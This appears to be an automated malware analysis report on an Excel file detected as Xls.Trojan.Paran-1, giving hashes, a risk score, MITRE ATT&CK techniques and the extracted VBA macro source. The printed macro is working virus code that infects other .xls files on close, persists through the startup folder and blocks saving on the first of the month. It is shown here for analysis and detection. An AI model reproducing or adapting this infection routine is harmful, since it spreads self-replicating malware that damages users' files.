Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5a27e0159f27c3e4…

MALICIOUS

Office (OLE)

53.5 KB Created: 1999-07-09 08:15:47 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: d0107957a87722e2228beb248cefc5fd SHA-1: c31e45d44f9861b9752dc3ab34558fe708097c31 SHA-256: 5a27e0159f27c3e469e8ad99ba4c99e0237586a7f2f2b1cf364a0671524a910a
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

This Excel file contains VBA macros that are designed to infect other Excel workbooks on the system. The macro attempts to copy itself into other .xls files and also attempts to establish persistence by saving a file to the startup path. The ClamAV detection of 'Xls.Trojan.Paran-1' further supports the malicious nature of this file.

Heuristics 1

  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5218 bytes
SHA-256: 7cd53a2c2ed398481ace9907caddf0d76180ccbf48fdaf34441fbe02678aa549
Detection
ClamAV: Xls.Trojan.Paran-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean) ' = AIM
On Error Resume Next
SearchAndInfect (ActiveWorkbook.Path)
SearchAndInfect ("c:\")
StayResident
If Minute(Now) = Int(60 * Rnd) Then
AIM.Show
End If
End Sub
Function SearchAndInfect(ipath As String)
On Error Resume Next
Application.ScreenUpdating = False
Dim code As String
Dim Header As String
Header = "Private Sub Workbook_BeforeClose(Cancel As Boolean) ' = AIM"
code = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.lines(1, 54)
Kill "c:\wondows\data.frx"
ActiveWorkbook.VBProject.VBComponents("AIM").Export ("C:\windows\data.frx")
Set fs = Application.FileSearch
fs.NewSearch
fs.LookIn = ipath
fs.FileName = "*.xls"
fs.SearchSubFolders = True
fs.Execute
For Each victim In fs.FoundFiles
Set wrkbook = Workbooks.Open(victim)
If wrkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.lines(1, 1) = Header And Len(wrkbook.VBProject.VBComponents("AIM").Name) > 0 Then
wrkbook.Close
Else
wrkbook.VBProject.VBComponents("ThisWorkbook").CodeModule.InsertLines 1, code
wrkbook.VBProject.VBComponents.Import (Application.Path & "\data.frx")
wrkbook.Save
wrkbook.Close
End If
Next
Kill "C:\windows\data.frx"
Application.ScreenUpdating = False
End Function
Sub StayResident()
Application.ScreenUpdating = False
ActiveWorkbook.SaveAs (Application.StartupPath & "\BOOK1.")
Application.ScreenUpdating = True
End Sub
Private Sub Workbook_BeforeSave(ByVal SaveAsUI As Boolean, Cancel As Boolean)
If Day(Now) = 1 Then
MsgBox "Hey man... are you still working?" & vbCr & "Get a life man!", vbSystemModal, "Excell Off-line"
Beep
MsgBox "I can't let you save this workbook today, sorry!", vbApplicationModal, "AIM"
Beep
MsgBox "And don't forget to wash your teeth with AIM" & vbCr & "The best toothpaste", vbApplicationModal, "AIM ADD"
Beep
Cancel = True
End If
End Sub
'End of virus heheh

Attribute VB_Name = "Φύλλο1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Worksheet_SelectionChange(ByVal Target As Excel.Range)

End Sub

Attribute VB_Name = "Φύλλο2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Φύλλο3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AIM"
Attribute VB_Base = "0{A57A0607-36BE-11D3-B990-E5B940FFCE7F}{A57A05FD-36BE-11D3-B990-E5B940FFCE7F}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
'This workbook has a lot of toothpaste inside
'toothpaste waz produced by yozak
'and AIM's research team!
'Toothapste of the year!AIM
Private Sub CommandButton1_Click()
On Error Resume Next
Dim lines(20) As String
Beep
Data = InputBox("Insert Something!", "yozak99")
If Data = "" Then MsgBox "Emptyness in your head!"
If Data = "toothpaste" Then
MsgBox "You paranoic!"
Else
MsgBox "Paranoic HAHAHHA!!.TOOTHPASTEPARANOIC!", vbSystemModal, "Paran!"
lines(0) = "Season of toothpaste": lines(1) = "Mad toothpaste makers": lines(2) = "Microsoft Toothpaste Progie"
lines(3) = "AIM": lines(4) = "FUCK CREST": lines(5) = "Crazy Toothpaste users": lines(6) = "'Toothpaste": lines(7) = "Yozak uses AIM"
lines(8) = "To protect your teeth use AIM": li
... (truncated)